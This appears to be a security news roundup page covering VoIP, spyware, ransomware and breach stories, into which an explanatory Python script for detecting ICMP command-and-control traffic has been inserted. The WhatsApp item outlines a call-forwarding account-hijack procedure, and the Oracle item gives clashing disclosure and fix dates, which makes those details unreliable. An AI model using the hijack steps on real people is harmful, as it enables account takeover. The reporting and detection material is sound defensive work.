Mitel VoIP appliances used in ransomware attack
Table of Contents
- Mitel VoIP appliances used in ransomware attack
- Syniverse (Vodafone supplier) compromised since May 2016
- Call forwarding “trick” allows for WhatsApp account hijack
- Discord as a financial messenger – what could go wrong?
- Metasploit 6.2 released which adds a SIP capture module
- Nessus adds a Cisco IOS-XE destination pattern bypass module
- Mitel phones had a backdoor when booted into special mode
- VitalPBX missing access control vulnerability
- Gallium APT uses new PingPull malware for espionage campaigns
- Oracle Took Six Months to Fix Critical Flaw in Fusion Middleware
- CafePress Fined Over Data Breach and Cover-up
- $100M Stolen from Blockchain Firm Harmony
- Ransomware as a Distraction from IP Theft
- GAO: Private Cyber Insurance, TRIP May Not be Enough to Cover Catastrophic Losses
- CISA: Assume VMware Products Not Patched Against Log4Shell are Compromised
- CISA Asks for Feedback on Trusted Internet Connections 3.0 Cloud Use Case
- Google: Hermit Spyware is Being Used in Italy and Kazakhstan
- ToddyCat APT
- US critical infrastructure needs better cyber insurance coverage
- Harmony mega-hack
- CafePress fine
- Ransomware attacks in Japan
- XCarnival hack
- Abortion hacktivism
- Google Analytics banned in Italy
- Opera launches no-log VPN
- Supreme Court ruling bot activity
- More cash for CISA
- New Air Force cyber chief
- Russia’s IT balkanization continues
- Mitel zero-day
- Malicious Python packages
- Cobalt Strike update
- Social engineering report
- LockBit 3.0
- Snake Keylogger
- API hammering
- Ransomware TTPs
- Agent Saitama
- Vulnerabilities get patched slower and slower
- Miracle exploit
- Codesys bugs
- Zena RCE
- The NYTimes Analyzes China’s Surveillance State Plans
- BEC Attackers Starting to Impersonate Third-party Vendors
- Attacker Selling Access to Networks via Atlassian Vuln
- Chinese Attackers Using Ransomware to Hide Espionage
- 2 New Cybersecurity Bills Signed Into Law
- CISA’s Cloud Security Technical Reference Architecture
- Automatic CAPTCHA With iOS
- U.S. abortion ruling reversal sparks calls for privacy laws
- Russian hackers targeting U.S. and other Ukraine allies
- Twitter apologizes for abusing user security information after $150M FTC settlement
- Google warns Hermit spyware is targeting iOS and Android users
- Mega says it can’t decrypt your files, a new exploit shows otherwise
- Researcher hacks into backend for network of smart Jacuzzis
- Strava app flaw revealed runs of Israeli officials at secret bases
- Are you a bot? Not with a PAT
- Delivery firm Yodel quiet over cyberattack
- $100M looted after crypto weak-link exploited
- US DoE’s National Cyber-Informed Engineering Strategy
- US, UK, New Zealand: Make Sure PowerShell is Securely Configured
- Multiple Vulnerabilities in Operational Technology Devices
- Malware Infects Networks at Two Texas Hospitals
- Cloudflare Outage Due to Network Configuration Issue
- CISA Publishes Revised Version of Cloud Security Technical Reference Architecture
- New US Cybersecurity Laws
- Cyberattack May Have Set Off Israeli Air Raid Sirens
- CISA Warns of Hillrom Medical Device Vulnerabilities
- Bill Would Require Regular Medical Device Security Requirement Updates from FDA
- Guilty Verdict in 2019 Capital One Breach
- WordPress Ninja Forms Vulnerability Fixed
- Flagstar Bank Discloses Data Breach
- Proposed Legislation in US Senate Would Ban Sale of Health and Location Data
- International Effort Disrupts Russian Botnet
- Rapid7 Report: Types of Data Most Often Targeted by Ransomware Operators
- BRATA Malware Gains New Features
- Vulnerability in Cisco Small Business Routers
- Siemens Fixes Flaws in SINEC Network Management System
- Google TAG says it tracks 30 surveillance vendors
- Carnival Cruise settlement
- CS:GO skin heist
- New Instagram feature
- Chrome 103 is out
- 7-Zip now supports MotW
- NSA and allies on PowerShell
- CISA wants a cybersecurity hotline
- Long CISA onboarding
- US spy agencies prepared to loosen hiring rules
- US bill on privacy and data transfers
- Lithuania DDoS alert
- Conti infrastructure goes down
- Vulnerabilities used by ransomware gangs
- Search Marquis
- VMWare warning
- Scalping bots hit Israeli government sites
- RSocks gang
- Conti report
- Chinese APT
- Russia’s cyber operations
- Ukraine DDoS protection
- FLOSS v2.0
- Millions Of Secrets Exposed Via Web Application Frontend
- US TikTok User Data Has Been Repeatedly Accessed From China, Leaked Audio Shows
- What It Means that the U.S. Is Conducting Offensive Cyber Operations Against Russia
- Cisco patches critical, high-severity vulnerabilities in Email Security Appliance, home routers
- Top websites have sucky password policies
- BeanVPN leak
- StoreHub leak
- Rust Foundation grants
- Problematic bill
- Instagram sabotage
- Privacy legislation
- Alexa data used for ads
- Google fined in Russia
- RSocks seized
- Call center and BEC arrests
- Netherlands arrest
- icloudripper4you sentenced
- Russian hacker arrested
- Telerik attacks
- Houdini returns
- Initial access prices
- Redline Stealer
- Indian police framed reporters
- Legal threats
- Demonic vulnerability
- Ninja Forms vulnerability
- SharePoint and OneDrive ransomware
- More Hertzbleed
- RDP vulnerability finally patched
- Patch Tuesday is not ending
- GitHub updates
- BlackHat Arsenal
- Follina tooling
- Big Phish
- Ransomware is Underreported
- Good News, More BEC!
- Firefox upping privacy
- Splunk Releases Critical Update
- Microsoft Patch Tuesday Updates Include Follina Fix
- Microsoft Called Out for Dragging its Feet on Azure Fixes
- US HHS Security Risk Assessment Tool Version 3.3
- Healthcare Entities Respond to HHS RFI on Cybersecurity Requirements
- Cloudflare Says it Mitigated a 26M rps DDoS Attack
- Hertzbleed Side-Channel Attack
- Citrix Fixes ADM Vulnerabilities
- Latin American Governments Face Serious Ransomware Risks
- Ukraine’s Internet Routed Through Russia
- SBOMs Need to be Mapped to Known Vulnerabilities
- Cloud Security Alliance: Top Cloud Computing Risks
- Prison Time for Selling DDoS Attack Services
- 40 high-severity vulnerabilities included in June’s Patch Tuesday
- Symbiote malware can remain undetected on Linux machines
- Microsoft accused of concealing Azure vulnerabilities
- New Aadhaar leak
- Firefox Total Cookie Protection
- Thunderbird comes to Android
- IE retirement
- Chrome’s Rust migration
- GhostDNS attacks
- DownThem & AmpNode
- Another record-breaking DDoS attack
- NFT scamming
- Gallium APT
- Iranian operation
- Follina patches
- Other Patch Tuesday fixes
- Hertzbleed attack
- SynLapse details
- Zombie zero-days
- GhostWriter news
- Microsoft buys Miburo
- Vulnerability: Credential leak in Travis CI log API
- Article: Microsoft’s recommendations for mitigating against API threats
- Travis CI API Exposes User Tokens
- PACMAN Hardware Attack Defeats Apple M1 Pointer Authentication
- Kaiser Permanente Breach Affects 70,000 Patients
- The World Economic Forum’s Atlas Initiative Aims to Map Cybercrime Ecosystem
- Ransomware Attacks Targeting Costa Rica are Among First Targeting a Country’s Government
- Envoy Proxy DoS Vulnerability
- Google Fixes Seven Vulnerabilities in Chrome for Desktop
- Gallium Hacking Group’s New Remote Access Trojan is Hard to Detect
- Travel Companies Forced to Share Data
- Goodbye, IE (Mostly)
- Google shuts down YouTube Russian propaganda channels
- Optimism hack happy ending
- German energy suppliers
- Cloud middleware
- Firefox reducing sandbox escape attack surface
- Confluence exploitation
- SeaFlower group
- ASyncRAT stats
- Finland arrest
- Nigerian bank robbers
- Adconion execs plead guilty
- Few NetWalker victims complained
- HelloXD ransomware
- Android malware
- Lyceum APT
- PACMAN attack
- K8s vulnerability
- Trendnet vulnerabilities
- Drupal bugs
- Backdoor account in thermal cameras
- Backdoor in Mitel VoIP phones
- U.S. ordered travel companies to spy on Russian hacker for years
- U.S. warns Chinese hackers are targeting ISPs and telecoms
- RSA 2022: Cloud providers still using secret middleware
- Inside ID.me’s torrid pandemic growth spurt: ill-equipped staff and data-security lapses
- How a saxophonist tricked the KGB by encrypting secrets in music
- How to open a locked Sentry Safe in seconds
- New Tesla hack gives thieves their own personal key
- OneTrust has ‘record’ quarters, still lays off 25% staff
- Feds shutter marketplace selling SSNs
- Microsoft mum on Follina exploit
- US Government Agencies with Legacy Systems Face Struggle to Implement MFA
- Android Updates for June 2022
- Facebook Phishing Campaign
- New Microsoft Defender Feature Isolates Unmanaged Devices
- Sophos Says Dwell Time Increased in 2021
- Follina is Being Actively Exploited to Spread Malware
- Joint Advisory: China Exploits Known Vulnerabilities to Target Telecoms
- CISA’s Cyber Innovations Fellows Initiative
- CISA Adds 39 Flaws to Known Exploited Vulnerabilities Catalog
- Public exploit code worsens Atlassian Confluence vulnerability scenario
- ChinaChopper web shell pops up again on backs of Atlassian bugs
- Evil Corp’s Sanctions Evasion Attempts Fall Flat
- Internet Anonymity Targeted in Authoritarian States and Democracies Alike
- iOS Safety Check
- PII market seized
- Children’s hospital attack thwarted
- Schulte is Still Unpleasant
- Chinese APT “Plumbing” Laid Bare
- Cyber Command Did Something. We Have No Idea What.
- Confluence exploitation
- Follina gets some love
- LockBit-Mandiant drama, explained
- Maiar hack
- Schulte profile
- iOS gets separate security update mechanism
- iOS to protect victims of domestic abuse
- Binance exposed
- XLoader pauses Ukraine infections
- Arrest in Vietnam
- Passwordstate digital certificate
- Skimmer detained in Ukraine
- CyberSpecial Forces
- SSNDOB seized
- Russo-Ukrainian war
- Micropatch for another Microsoft zero-day
- Telegram denies vulnerability report
- Android security patches
- IBM acquires Randori
- Follina Vulnerability Remains Unpatched
- Follina is Being Actively Exploited
- Audit Raises Questions About Federal Dam Cybersecurity Accountability
- Windows Autopatch Now in Preview
- Atlassian Releases Patches for Critical Confluence Server and Data Center Vulnerability
- US Draft Legislation Would Create National Data Privacy and Security Framework
- New York’s Right to Repair Bill for Electronics
- Security Flaws in BD Synapsis, BD Pyxis, and Illumina Medical Devices
- Palermo, Italy Suffers Cyberattack
- GADOLINIUM (APT40)
- Google GCP VRP
- U-boot vulnerabilities
- CodeSec is now free
- Microsoft disrupts Bohrium APT infrastructure
- Ukrainian TV station hack
- The apes are gone, again
- Google privacy settlement
- Telegram privacy accusations
- WhatsApp threatens to leave the Netherlands
- Microsoft Edge network service sandbox
- New Firefox privacy feature
- 1Password joins FIDO
- Russia gets tough on privacy
- Australia’s new cyber minister
- Pysa research
- Windows RDP brute-forcing
- Solver services
- Banks in Singapore Must Take Steps to Protect Customers from Online Fraud
- Atlassian Warns of Confluence Server Vulnerability
- FBI Blocked Cyberattack Against Boston Children’s Hospital
- VPN Company Will Move Servers Out of India
- FluBot Takedown
- Foxconn Plant Hit with Ransomware
- US Dept. of Justice Seizes Domain Names Used for Cybercrime
- Nakasone: US Conducted Offensive Cyber Ops
- CISA Says Dominion Voting Machine Flaws Were Not Exploited
- Apple App Store stats
- Microsoft Autopatch
- Firefox 101
- Some Mozilla VPN code goes FOSS
- ExpressVPN pulls out of India
- Voice privacy nightmare
- FluBot takedown
- DOJ seizures
- Operation KillerBee
- Elasticsearch ransom attacks
- Malicious npm package
- EvilCorp evading sanctions
- Faking malicious traffic
- YourCyanide ransomware
- Conti goes after Intel firmware
- Popping Eagle
- Chinese APTs and cybercrime
- Backdoor stays in
- Confluence zero-day
- New MSFT zero-day, same core problem
- OpenSSL vulnerability
- UNISOC bugs
- Unpatched Horde webmail bug
- Digital Shadows
- Tool release
- Amnesty fellowship
- FBI thwarts Iranian attack
- Cloud Security
- Container Security
- Blue Team
- Supply Chain
- Running Bug Bounty Programs
- Network Security
- Web Security
- “Follina” exploit in Microsoft Office gives attackers potential backdoor to code execution
- Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service
- Vulnerability: OAS platform vulnerable to critical RCE and API access flaw
- Vulnerability: Mass account takeover in Yunmai smart scale API
- Clop Ramps Up
- Universities Put On Watch
- Arrested REvil Members Will Skate
- SpiceJet Grounded
- 60 million wins
- SilverTerrier Head Arrested
- A Minister for Cyber Security!
- Chinese Open Source is Not that Open
- Russia orders Google to remove Tor Browser from Russian Play Store
- Mirror Protocol hack #1
- Mirror Protocol hack #2
- Portland falls to BEC
- AON incident
- 365 Data Centers lawsuit
- Chinese FOSS censorship
- Microsoft Entra
- PSP protocol
- Ukrainian BGP hijack
- New HelloXD ransomware
- Android malware ecosystem
- Operation KillerBee
- FBI alert
- WSO2 exploitation
- Amadey Loader
- Mars Stealer
- Office zero-day mitigation
- Microsoft Office Zero-Day Vulnerability
- GitHub Details npm Account Information Stolen in April
- Microsoft Rolling Out Security Defaults
- Commerce Publishes Final Rule on Cybersecurity Tools Export Controls
- FBI Warns Criminals are Selling University Credentials
- Talos List of Open Automation Software Vulnerabilities
- Italy’s CSIRT Warns of Potential DDoS Attacks
- More Pushback Against CERT-In Breach Reporting Requirements
Mitel has not been very lucky lately with the security news. The latest involves abuse of a zero-day exploit – CVE-2022-29499 – in a ransomware attack, as detailed by CrowdStrike. The vulnerable VoIP appliances are MiVoice Connect appliances (SA 100, SA 400 and Virtual SA). The CrowdStrike blog post does a very good job of detailing the results of their forensic investigation and indicates that the vulnerable MiVoice Connect appliance in question was used as the entry point into an organisation’s network.
The vulnerabilities exploited in the Mitel appliance were related to the web interface and problematic PHP application code.
Read more in
- The Call Is Coming from Inside the House: CrowdStrike Identifies Novel Exploit in VOIP Appliance
- CISA Warns of Active Exploitation of ‘PwnKit’ Linux Vulnerability in the Wild
- Mitel VoIP Bug Exploited in Ransomware Attacks
- Hackers Exploit Mitel VoIP Zero-Day in Likely Ransomware Attack
Syniverse (Vodafone supplier) compromised since May 2016
This one seems like a big deal considering the sort of access required to provide the services offered by the allegedly compromised company, Syniverse. They are essentially a CPaaS, providing connectivity to mobile operators globally.
Call forwarding “trick” allows for WhatsApp account hijack
This article is about a trick posted by Rahul Sasi (of CloudSEK) which can be used to hijack WhatsApp accounts. Summarized, it goes like this:
- The adversary social engineers the victim into dialing the MMI codes that forward all calls to a phone number controlled by the adversary
- The adversary starts the WhatsApp registration process using the victim’s phone number
- The adversary chooses a voice call as the verification method (instead of SMS)
- The adversary hijacks the victim’s WhatsApp account
This is one of those few times where security people highlight the problems of voice calls for authentication rather than SMS OTP (see the Syniverse coverage). It is also a very old-school attack being applied to WhatsApp authentication. But really, being able to cause all calls to be forwarded to a different number introduces many other problems for the victim. MMI codes are relatively obscure to most people these days, yet they are still there.
It got me thinking, would anyone miss them if they were gone?
Discord as a financial messenger – what could go wrong?
Vice published an interesting article about privacy issues within Discord and how its threat model focuses on gamers, certainly not on crypto trading and crypto-related projects. However, it seems that the crypto community has a soft spot for Discord and is making the wrong assumptions about its security and privacy features.
One of the main claims is that the Discord API appears to leak the name, description, member list and activity data of every private channel on every server. The article mentions a number of other issues and caveats and is worth a read if you’re interested in large platforms of this sort.
Metasploit 6.2 released which adds a SIP capture module
The Metasploit 6.2 announcement mentions a new capture plugin with support for capturing SIP authentication. The same plugin captures many other protocols too, most typically NTLM, as well as SMTP, Telnet, FTP and so on.
Here’s the description of the module:
This module provides a fake SIP service that is designed to capture authentication credentials. It captures challenge and response pairs that can be supplied to Cain or JtR for cracking.
Nessus adds a Cisco IOS-XE destination pattern bypass module
The Nessus vulnerability scanner has a new module that detects a Cisco IOS vulnerability which leads to toll fraud when abused. Description of the module:
A vulnerability in the Voice Telephony Service Provider (VTSP) service of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to bypass configured destination patterns and dial arbitrary numbers.
This vulnerability is due to insufficient validation of dial strings at Foreign Exchange Office (FXO) interfaces. An attacker could exploit this vulnerability by sending a malformed dial string to an affected device via either the ISDN protocol or SIP. A successful exploit could allow the attacker to conduct toll fraud, resulting in unexpected financial impact to affected customers.
The Nessus check relies on detecting the Cisco IOS-XE version, so it does not actually demonstrate the vulnerability. The patch has been available since September 2021.
Read more in
- Cisco IOS XE Software FXO Interface Destination Pattern Bypass (cisco-sa-fxo-pattern-bypass-jUXgygYv)
- Cisco IOS and IOS XE Software FXO Interface Destination Pattern Bypass Vulnerability
Mitel phones had a backdoor when booted into special mode
Researchers from the security firm SySS have reported vulnerabilities in Mitel phones (6900 Series) that allow attackers with physical access to gain root access to the phone. The issue is that the phone starts a telnet backdoor when booted while the * and # keys are held down. It is tracked as two CVEs.
Read more in
- Mitel Product Security Advisory 22-0004: Mitel 6800 Series SIP Phone and 6900 Series SIP Phone Access Control Vulnerability
- Mitel Product Security Advisory 22-0003: Mitel 6900 Series IP Phone Access Control Vulnerability
VitalPBX missing access control vulnerability
This one is tracked as CVE-2022-29330 with the following description:
Missing access control in the backup system of Telesoft VitalPBX before 3.2.1 allows attackers to access the PJSIP and SIP extension credentials, cryptographic keys and voicemails files via unspecified vectors.
Blog post by Corinne Henin & Thibaut Henin of Arsouyes about the vulnerability: CVE-2022-29330 – vulnerability in VitalPBX < 3.2.1
Gallium APT uses new PingPull malware for espionage campaigns
A China-based APT called “Gallium” is using a new trojan to target companies operating in Southeast Asia, Europe and Africa. Called “PingPull,” the backdoor uses ICMP for C2 communications and has never been seen before in the wild. PingPull is a Visual C++-based malware that provides actors with the ability to access a reverse shell and run arbitrary commands on a compromised host. The actor could then move files, enumerate storage devices and timestomp files. Gallium traditionally targets telecommunications, finance and government organizations.
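As an added example (not from the page or from the PingPull research it summarises), the following Python heuristics flag ICMP echo flows that do not behave like stock ping probes: oversized or high-entropy payloads, and payload bodies that change from packet to packet. PingPull’s own packet format is not described here, so the thresholds, the grouping by ICMP identifier and the sample packets are constructed assumptions.

```python
"""Heuristic detection of ICMP echo traffic that behaves like a covert C2
channel. Added example for this page, not PingPull's own protocol (the page
does not describe its packet format); thresholds and samples are assumptions."""
import hashlib
import math
import struct
from collections import Counter, defaultdict

# Tunable thresholds (assumed values, not taken from any PingPull analysis).
MAX_NORMAL_PAYLOAD = 64   # stock ping sends 32 (Windows) or 56 (Linux) bytes
HIGH_ENTROPY_BITS = 5.0   # bits/byte: ASCII text and padding score well below,
                          # random-looking (encrypted) data well above
MIN_FLOW_PACKETS = 3      # do not alert on a single odd packet
ECHO_TYPES = (0, 8)       # echo reply, echo request


def parse_icmp(raw: bytes) -> dict:
    """Split an ICMPv4 message into header fields and payload (checksum ignored)."""
    if len(raw) < 8:
        raise ValueError("ICMP message shorter than its 8-byte header")
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    return {"type": icmp_type, "id": ident, "seq": seq, "payload": raw[8:]}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_stock_ping_payload(payload: bytes) -> bool:
    """Recognise the fill patterns stock ping tools produce: Windows uses the
    alphabet string; iputils ping puts a timestamp (8 or 16 bytes) first and
    then sets each byte to its own offset (0x10, 0x11, ... on 64-bit hosts)."""
    if payload.startswith(b"abcdefghijklmnopqrstuvwabcdefghi"):
        return True
    for ts_len in (8, 16):
        body = payload[ts_len:]
        if body and all(b == (ts_len + i) & 0xFF for i, b in enumerate(body)):
            return True
    return False


def packet_reasons(pkt: dict) -> list:
    """Per-packet signals that an echo packet does not look like a ping probe."""
    reasons = []
    payload = pkt["payload"]
    if pkt["type"] not in ECHO_TYPES or is_stock_ping_payload(payload):
        return reasons
    if len(payload) > MAX_NORMAL_PAYLOAD:
        reasons.append(f"payload of {len(payload)} bytes")
    if shannon_entropy(payload) > HIGH_ENTROPY_BITS:
        reasons.append("high-entropy payload")
    return reasons


def detect_icmp_c2(packets) -> dict:
    """packets: iterable of (src_ip, dst_ip, raw_icmp_bytes).
    Returns {(src, dst, icmp_id): sorted reasons} for flows worth a look:
    repeated suspicious packets, or payload bodies that change from packet
    to packet (ping keeps its body constant and only updates the timestamp).
    Grouping by ICMP identifier is an assumption about how a C2 channel
    would keep its session state."""
    flows = defaultdict(lambda: {"count": 0, "reasons": Counter(), "bodies": set()})
    for src, dst, raw in packets:
        pkt = parse_icmp(raw)
        if pkt["type"] not in ECHO_TYPES:
            continue
        flow = flows[(src, dst, pkt["id"])]
        flow["count"] += 1
        flow["reasons"].update(packet_reasons(pkt))
        flow["bodies"].add(pkt["payload"][16:])
    alerts = {}
    for key, flow in flows.items():
        if flow["count"] < MIN_FLOW_PACKETS:
            continue
        reasons = set(flow["reasons"])
        if len(flow["bodies"]) > 1:
            reasons.add("payload body changes between packets")
        if reasons:
            alerts[key] = sorted(reasons)
    return alerts


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Assemble an ICMP echo message; checksum left at 0 for these samples."""
    return struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload


# Constructed samples: three Linux-style pings (16-byte timestamp + bytes
# 0x10..0x37) and three C2-like requests whose payloads are 128 bytes of hash
# output, standing in for encrypted tasking.
LINUX_PING_BODY = bytes(range(0x10, 0x38))
SAMPLE_PACKETS = [
    ("10.0.0.5", "10.0.0.1", build_echo(8, 0x1234, seq,
        struct.pack("!QQ", 1_700_000_000 + seq, 0) + LINUX_PING_BODY))
    for seq in range(1, 4)
] + [
    ("10.0.0.7", "203.0.113.9", build_echo(8, 0xBEEF, seq,
        b"".join(hashlib.sha256(bytes([seq, i])).digest() for i in range(4))))
    for seq in range(1, 4)
]

if __name__ == "__main__":
    for flow, reasons in detect_icmp_c2(SAMPLE_PACKETS).items():
        print(flow, ", ".join(reasons))
```

Feeding the function from a live capture (for example via a pcap reader) only requires mapping each packet to the (src, dst, raw ICMP bytes) tuple it expects.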
Oracle Took Six Months to Fix Critical Flaw in Fusion Middleware
Researchers say that six months elapsed between the time they notified Oracle of a critical vulnerability in Fusion Middleware and the day Oracle released a fix for the issue. The deserialization-of-untrusted-data vulnerability can be exploited remotely without authentication to achieve arbitrary code execution. The researchers notified Oracle of the flaw in October 2021; Oracle fixed the issue in its April 2021 Critical Patch Update.
- Deserialization issues are all too common in middleware, and can be difficult to patch right. The usual fix employed by Oracle in the past is to establish blocklists to not allow the instantiation of very specific, deemed to be dangerous, objects. But these blocklists have been bypassed in the past if they were not defined well. A huge ecosystem of applications relies on this middleware and Oracle does need to pay attention to minimize the possibilities of breaking these applications.
- As we’ve seen with Microsoft and many other vendors of large complex software, some software flaws can take several months to fix and test. But Oracle has been silent on why this one took so long and has not provided any guidance to customers on shielding or workaround actions to take while awaiting a real fix.
- One exploit involves chaining two vulnerabilities, CVE-2022-21445 (deserialization of untrusted data) and CVE-2022-21497 (SSRF), to achieve pre-authentication RCE. The time to release a patch was likely due to interdependency and regression testing and resolution. You should have already deployed the April CPU. If not, the publishing of the exploit details should be seen as a call to act.
- Having been on the inside of some of these decisions, one can testify that the vendors are often between a rock and a hard place, in a dilemma that cannot be recognized or appreciated from the outside. Moreover, the vendor may be aware of many vulnerabilities more severe than those reported from the outside and is fixing them in the most efficient order. One is inclined to cut the vendor some slack. That said, six months with no explanation or guidance to customers is a little much. One starts to question the vendor’s priorities.
Read more in
- Miracle – One Vulnerability To Rule Them All
- Researchers: Oracle Took 6 Months to Patch ‘Mega’ Vulnerability Affecting Many Systems
- Researchers criticize Oracle’s vulnerability disclosure process
CafePress Fined Over Data Breach and Cover-up
The US Federal Trade Commission (FTC) has finalized an order against CafePress over a 2019 breach that compromised data for nearly 23 million accounts. CafePress kept data longer than it needed to; stored sensitive information, like Social Security numbers (SSNs), in plaintext; did not secure its systems sufficiently; and covered up the breach, electing not to inform impacted customers. The complaint was filed against former CafePress parent company Residual Pumpkin, LLC, and current CafePress owner PlanetArt, LLC. The final order requires both companies to implement comprehensive cybersecurity programs, employ multi-factor authentication, store data for only the minimum amount of time necessary, and encrypt SSNs.
- This is a good report to use to convince management of the importance of cybersecurity review being part of Merger and Acquisition decisions. Planet Art acquired Café Press after the 2019 breach and may have adjusted the amount they paid downward. However, 3 years later Planet Art will be subject to the FTC action on their security program, even if the original parent company (Residual Pumpkin) has to pay the fine.
- It’s not a bad idea to review where you’re storing PII and make sure you’re aligned with the relevant privacy laws (CCPA, GDPR, etc.), to include retention and appropriate use restrictions. Be sure to check online services used, such as event registration services, for data collected and stored to ensure they also meet protection requirements. Leverage your legal team to understand how these laws apply to your business. Build awareness training for both developers and users as well as creating any needed supporting KB articles and/or policies.
Read more in
- FTC Finalizes Action Against CafePress for Covering Up Data Breach, Lax Security
- FTC Takes Action Against CafePress Over Massive Data Breach, Cover-Up
- CafePress Fined $500,000 After Massive Data Breach
$100M Stolen from Blockchain Firm Harmony
Thieves have stolen more than $100M in cryptocurrency from blockchain company Harmony. Harmony provides bridge services for users who want to transfer cryptocurrency across different blockchains. The company’s Horizon Ethereum Bridge was compromised last week. Harmony is offering a $1M bounty for the return of the stolen funds.
- Of course, that $100M was only worth $30M a few days later… Hard to get real data on “cryptocurrency” use but it seems clear more of it is stolen each year than is used for actual business transactions.
- Harmony transfers cryptocurrencies, stablecoins and non-fungible tokens between their blockchain and other networks. The Ethereum tokens were what was stolen. The attackers used 11 transactions which extracted the ETH tokens on the bridge. Moreover, these were doubly encrypted via passphrase and key management service. The pilfered keys were able to satisfy the multi-signature contract allowing the funds to be transferred. The point is you need to understand how your crypto is protected, how exchanges are authorized and what recourse you have if compromised.
Read more in
- Horizon Offers $1M Bounty to Hackers Who Stole $100M
- Hackers stole $100 million in latest crypto theft
- More than $100m in cryptocurrency stolen from blockchain biz
Ransomware as a Distraction from IP Theft
Researchers from Secureworks say that Chinese state-sponsored threat actors may be using ransomware as a distraction while they plumb organizations’ networks for intellectual property and other sensitive data. Secureworks has provided a list of threat indicators to help detect malicious activity related to the threat actors.
- The same is often true of denial-of-service attacks, which are often used as distractions from the main tactics, or are used simply to flood SIEM consoles with alerts that will slow the security team from handling the critical alerts.
- View this as a twist to current ransomware + extortion techniques. The ransomware is used to obfuscate evidence, distract investigators and otherwise cover the indications relating to exfiltration of data. The attackers are using the HUI loader, which is a custom DLL loaded by legitimate programs subject to DLL search order hijacking. The loader then installs a RAT such as Cobalt Strike, PlugX, SodaMaster and QuasarRAT. The attack leverages weaknesses in your boundary control devices, taking us back to making sure they are patched, the configuration is verified as secure, and you’re using MFA for remote access. Leverage the IOCs in the Secureworks article.
Read more in
- BRONZE STARLIGHT Ransomware Operations Use HUI Loader
- Chinese hackers use ransomware as decoy for cyber espionage
- Chinese APT Group Likely Using Ransomware Attacks as Cover for IP Theft
- These hackers are spreading ransomware as a distraction – to hide their cyber spying
GAO: Private Cyber Insurance, TRIP May Not be Enough to Cover Catastrophic Losses
The US Government Accountability Office (GAO) is concerned that currently available private cyber event insurance and the government’s Terrorism Risk Insurance Program (TRIP) may not be sufficient to cover catastrophic financial losses due to cyberattacks. GAO recommends that “CISA and the Department of the Treasury’s Federal Insurance Office (FIO) should jointly assess the extent to which risks to critical infrastructure from catastrophic cyber incidents and potential financial exposures warrant a federal insurance response, and inform Congress of the results of their assessment.”
- The key line in this 53 page report is “One option that has been proposed is to tie federal assistance for cyber-related losses to cybersecurity requirements.” Insurance can’t cover catastrophic losses that are due to lack of basic security hygiene. Like any form of insurance, to be useful to businesses, or for the government to step in when state-sponsored or terrorist-initiated attacks cause broad damage, cyberinsurance policies have to be based on proof of maintaining baseline standards. In this case, the government will likely point to the NIST framework.
- Insurance companies have been revising language and criteria in response to trends in ransomware claims. Review your cyber insurance to understand what it covers and what the triggers are. For example, the GAO believes that incidents may not meet the criteria needed to be categorized as terrorism, resulting in a non-payment. Determine if there are new criteria, such as vulnerability assessments or MFA, you are also now required to meet for your insurance to be valid; don’t delay closing any gaps here.
Read more in
- Cyber Insurance: Action Needed to Assess Potential Federal Response to Catastrophic Attacks
- US watchdog is worried cyber insurance won’t cover ‘catastrophic cyberattacks’
- GAO: Potential Federal Cyber Insurance Program Should Avoid Moral Hazard
CISA: Assume VMware Products Not Patched Against Log4Shell are Compromised
In a joint cybersecurity advisory, the US Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) warn that threat actors are continuing to exploit Log4Shell in VMware Horizon® and Unified Access Gateway (UAG) servers. CISA and CGCYBER urge organizations with vulnerable systems to assume compromise and begin threat hunting action using the indicators of compromise included with the advisory.
- VMware released fixes for Log4J back in December. If you have any systems which are still not updated, you’re going to want to forensicate them fully before trusting them. Make sure that you’re minimizing the services exposed to the Internet and that accounts are audited, removing those which are unused or no longer needed. Lastly, strong authentication is pretty important; don’t overlook it, keep an eye on excepted users, and find a way to not have any exceptions.
- Post SolarWinds, assuming persistent but covert compromise, might well be the appropriate default. In the face of such compromise, the efficient defensive strategy is strong process-to-process isolation. The goal should be so-called “zero trust.”
Read more in
- Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems
- Attackers Use Log4Shell to Hack Unpatched VMware Products
- CISA: Hackers are still using Log4Shell to breach networks, so patch your systems
- CISA: Log4Shell exploits still being used to hack VMware servers
- APT Groups Swarming on VMware Servers with Log4Shell
CISA Asks for Feedback on Trusted Internet Connections 3.0 Cloud Use Case
The US Cybersecurity and Infrastructure Security Agency (CISA) is seeking feedback and comments on its Trusted Internet Connections (TIC) 3.0 Cloud Use Case. This rounds out the series of TIC use cases: CISA released the Traditional TIC Use Case, Branch Office Use Case, and Remote User Use Case last year. “The goal of TIC 3.0 is to secure federal data, networks, and boundaries while providing visibility into agency traffic, including cloud communications.” CISA is accepting public comment on the TIC 3.0 Cloud Use Case through July 22, 2022.
- TIC is a mixed bag. In some scenarios, such as HPC, it is a non-starter for effective connectivity across the internet. The goal is to achieve a version of TIC which is aligned with Zero Trust and a cloud-based service architecture. Take a hard look at the draft and provide feedback to ensure the end model is usable.
Read more in
- Serving Up “As-a-Service”: TIC Releases Draft Use Cases Covering Cloud Services
- Trusted Internet Connections 3.0 | Cloud Use Case (PDF)
- TRUSTED INTERNET CONNECTIONS GUIDANCE REPOSITORY
- CISA Seeks Public Feedback on TIC 3.0 Cloud Use Case
Google: Hermit Spyware is Being Used in Italy and Kazakhstan
Google says that spyware from Italian company RCS Labs is being used to target people in Italy and Kazakhstan. The spyware, known as Hermit, targets both iOS and Android devices, and uses drive-by downloads to gain initial footholds on targeted devices. Hermit can steal data from infected phones and can also make and record calls.
- The malicious applications masquerade as account recovery applications. Consider carefully requests to install applications to support actions like this, and verify, out-of-band, that they are indeed part of the process. Make sure that your users understand the recovery processes for accounts associated with applications they use. Make sure that users only install applications from trusted app stores, and that they know what to do when they are requested to install one from another source.
Read more in
- Spyware vendor targets users in Italy and Kazakhstan
- Google Warns Spyware Being Deployed Against Android, iOS Users
